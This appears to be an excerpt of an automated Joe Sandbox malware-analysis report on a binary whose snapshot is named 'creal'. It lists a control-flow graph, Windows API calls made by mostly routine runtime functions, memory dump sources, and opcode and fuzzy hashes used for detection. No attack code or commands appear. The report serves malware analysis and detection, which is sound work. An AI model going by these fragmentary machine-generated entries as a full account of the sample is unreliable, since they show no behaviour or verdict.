                                                                                                                                                                                                                control_flow_graph 925 7ff67a61d620-7ff67a61d645 926 7ff67a61d64b-7ff67a61d64e 925->926 927 7ff67a61d913 925->927 929 7ff67a61d687-7ff67a61d6b3 926->929 930 7ff67a61d650-7ff67a61d682 call 7ff67a61aed8 926->930 928 7ff67a61d915-7ff67a61d925 927->928 932 7ff67a61d6be-7ff67a61d6c4 929->932 933 7ff67a61d6b5-7ff67a61d6bc 929->933 930->928 935 7ff67a61d6c6-7ff67a61d6cf call 7ff67a61c9e0 932->935 936 7ff67a61d6d4-7ff67a61d6e9 call 7ff67a62408c 932->936 933->930 933->932 935->936 940 7ff67a61d6ef-7ff67a61d6f8 936->940 941 7ff67a61d803-7ff67a61d80c 936->941 940->941 944 7ff67a61d6fe-7ff67a61d702 940->944 942 7ff67a61d80e-7ff67a61d814 941->942 943 7ff67a61d860-7ff67a61d885 WriteFile 941->943 945 7ff67a61d816-7ff67a61d819 942->945 946 7ff67a61d84c-7ff67a61d85e call 7ff67a61d0d8 942->946 949 7ff67a61d887-7ff67a61d88d GetLastError 943->949 950 7ff67a61d890 943->950 947 7ff67a61d713-7ff67a61d71e 944->947 948 7ff67a61d704-7ff67a61d70c call 7ff67a614a00 944->948 951 7ff67a61d838-7ff67a61d84a call 7ff67a61d2f8 945->951 952 7ff67a61d81b-7ff67a61d81e 945->952 973 7ff67a61d7f0-7ff67a61d7f7 946->973 954 7ff67a61d72f-7ff67a61d744 GetConsoleMode 947->954 955 7ff67a61d720-7ff67a61d729 947->955 948->947 949->950 957 7ff67a61d893 950->957 951->973 959 7ff67a61d8a4-7ff67a61d8ae 952->959 960 7ff67a61d824-7ff67a61d836 call 7ff67a61d1dc 952->960 963 7ff67a61d74a-7ff67a61d750 954->963 964 7ff67a61d7fc 954->964 955->941 955->954 958 7ff67a61d898 957->958 966 7ff67a61d89d 958->966 967 7ff67a61d90c-7ff67a61d911 959->967 968 7ff67a61d8b0-7ff67a61d8b5 959->968 960->973 971 7ff67a61d756-7ff67a61d759 963->971 972 7ff67a61d7d9-7ff67a61d7eb call 7ff67a61cc60 963->972 964->941 966->959 967->928 974 7ff67a61d8b7-7ff67a61d8ba 968->974 975 7ff67a61d8e3-7ff67a61d8ed 968->975 977 7ff67a61d75b-7ff67a61d75e 971->977 978 7ff67a61d764-7ff67a61d772 971->978 972->973 973->958 980 7ff67a61d8bc-7ff67a61d8cb 974->980 981 7ff67a61d8d3-7ff67a61d8de call 7ff67a615580 974->981 982 7ff67a61d8ef-7ff67a61d8f2 975->982 983 7ff67a61d8f4-7ff67a61d903 975->983 977->966 977->978 984 7ff67a61d7d0-7ff67a61d7d4 978->984 985 7ff67a61d774 978->985 980->981 981->975 982->927 982->983 983->967 984->957 987 7ff67a61d778-7ff67a61d78f call 7ff67a624158 985->987 991 7ff67a61d7c7-7ff67a61d7cd GetLastError 987->991 992 7ff67a61d791-7ff67a61d79d 987->992 991->984 993 7ff67a61d7bc-7ff67a61d7c3 992->993 994 7ff67a61d79f-7ff67a61d7b1 call 7ff67a624158 992->994 993->984 996 7ff67a61d7c5 993->996 994->991 998 7ff67a61d7b3-7ff67a61d7ba 994->998 996->987 998->993
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF67A61D60B), ref: 00007FF67A61D73C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF67A61D60B), ref: 00007FF67A61D7C7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                • Opcode ID: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                                                                                                                                                                • Instruction ID: dc49f166e2840bb7911414a8c6c41195ede8625b88d960494866aeeda93c7796
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2891BE63E29A52D5F7619F65D4402BE2FA0EB44F88F1441B9DF0E96AA5DE3CE481E300
                                                                                                                                                                                                                Function 00007FF67A61FDEC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                • Opcode ID: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                                                                                                                                                                • Instruction ID: 12bb18dd9536e7a3443c472f342c4abcdbba80539f183eaea4a318b95cee5972
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD510673F242128AFB24DF64D9556BE2BA1BB01B68F500176DE1E92AF5DF3CA402D740
                                                                                                                                                                                                                Function 00007FF67A615954 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                • Opcode ID: 8b92353bfe11502a71d0b1a2b896feb12fc002a0d7da91d128652a49e7fc4eaa
                                                                                                                                                                                                                • Instruction ID: 88d30327ac23481e91fb7118ab09bc565a214bad3ef63315a3172e26771d18c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b92353bfe11502a71d0b1a2b896feb12fc002a0d7da91d128652a49e7fc4eaa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73516D23A286418AFB10DFB9D4903BE7BA1EB48F58F148575DE0D8B6A9DF38D4819740
                                                                                                                                                                                                                Function 00007FF67A60C17C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1452418845-0
                                                                                                                                                                                                                • Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                                                                                                                                                                • Instruction ID: 9e83745d914635d74254628e4ac6ed2389ee012e41c0af235abfdbd67401aa3b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F317923E3D50345FB24ABA4D462BBB2391AF55F44F4440B5E90ECB6F7DE2CB884A201
                                                                                                                                                                                                                Function 00007FF67A615800 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                • Opcode ID: d82536c74c1c179bb7e2097ade32aabeafd499f25a183bbc1212597eee9ee92e
                                                                                                                                                                                                                • Instruction ID: 2546e234afc32847a224dbc0cddcf36c00e2fdfe58f4e1a014cb358e996514d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d82536c74c1c179bb7e2097ade32aabeafd499f25a183bbc1212597eee9ee92e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F41A223D2879283E750DF24D5103BAA760FF94B64F109375E69C83AE9DF6CA5E09700
                                                                                                                                                                                                                Function 00007FF67A61A0C0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                • Opcode ID: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
                                                                                                                                                                                                                • Instruction ID: f4d0ecae8e2833b7597498a32db96f9e48e3709fd28e1830550e153f34900f5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBD09E12B3870646EA146F719C5907A16159F6CF05F1454BCDC5B963F3CD3DE84D6340
                                                                                                                                                                                                                Function 00007FF67A608B80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateDirectoryMessage
                                                                                                                                                                                                                • String ID: Security descriptor is not initialized!
                                                                                                                                                                                                                • API String ID: 73271072-986317556
                                                                                                                                                                                                                • Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                                                                                                                                                                • Instruction ID: 1e8f126f48bde024234eefc6660c8faf4af9086f51ae0b5854ed1577d1d6cdc8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9E092B3A2870686EA109F24E80466B3290FB55F54F8013B4E69CC73F4EF3CD1499B00
                                                                                                                                                                                                                Function 00007FF67A61037C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
                                                                                                                                                                                                                • Instruction ID: 621039c55449b54790eadd2641da3eda647dfea8263062395bd9ee206e136a3d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2510763B2925286EF24AE36D50067B6A91BF44FA8F254774DE6CC77E5CF3CE440A600
                                                                                                                                                                                                                Function 00007FF67A61C7F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                • Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                                                                                                                                                                • Instruction ID: 753a7ae042d90ebf08809dc2abf1dd7481ce9c89b5ffedc138ac4b39b8d3576a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C111EF22A28A8181EB908B25E44407EAB61EB44FF4F540371EE7D877E9CF3CD0409740
                                                                                                                                                                                                                Function 00007FF67A615AFC Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67A615A11), ref: 00007FF67A615B2F
                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67A615A11), ref: 00007FF67A615B45
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                • Opcode ID: bb6c187991dbf4b757a25256d017e3a2e1c80456cbfa3cced84e316cd19fd1ad
                                                                                                                                                                                                                • Instruction ID: 9d184ce73b0270fcb6d397e317a5ea98e93c0887d619402f80f6d74b9d08128f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb6c187991dbf4b757a25256d017e3a2e1c80456cbfa3cced84e316cd19fd1ad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D211517362C64281EB548B15E45117FF7A0EB84B71F501275E69EC59F8EF2CD054EB10
                                                                                                                                                                                                                Function 00007FF67A6181BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67A618039), ref: 00007FF67A6181DF
                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67A618039), ref: 00007FF67A6181F5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                • Opcode ID: dfa1188102ceb568b3fc50e3ccebbeec8210bce0ede501d744e2ebb6e9f34169
                                                                                                                                                                                                                • Instruction ID: 6544e0e6b7c644437fb578755a882529f875c13fc970405cd990774ffef72a15
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfa1188102ceb568b3fc50e3ccebbeec8210bce0ede501d744e2ebb6e9f34169
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68017C2352C652C2E7509F14E40127BB7A0FB85FA2F600275EAAD859E8DF3CD450EB00
                                                                                                                                                                                                                Function 00007FF67A61B00C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B022
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B02C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                • Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                                                                                                                                                • Instruction ID: 3ecb0ead6d2df735ca5381dfdc0ea46408671b8baef2151728c32fdbe52b3dec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7E08C52F2820282FF19ABB6D84507719919F98F02F4084B4C92DC72B6EE3CA8856650
                                                                                                                                                                                                                Function 00007FF67A6187A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2018770650-0
                                                                                                                                                                                                                • Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
